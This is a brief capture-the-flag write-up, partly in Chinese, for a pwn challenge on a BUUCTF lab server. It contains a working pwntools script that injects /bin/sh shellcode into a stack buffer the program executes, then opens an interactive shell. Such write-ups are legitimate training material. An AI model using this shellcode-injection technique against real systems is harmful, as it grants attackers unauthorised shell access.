from pwn import * context(arch='amd64', os='linux', log_level='debug') io = connect('node5.buuoj.cn',29531) io.recvuntil(b"Show me your magic!") shellcode = asm(shellcraft.sh()) payload = shellcode io.sendline(payload) io.interactive()
主函数中以下部分会导致无法进行反汇编但也同时是其漏洞。这个部分会导致程序将栈上的部分当作程序执行。 lea rax, [rbp+buf] call rax mov eax, 0 只要写入一个shellcode就结束了 shellcode见前一道wp 最后的exp:exp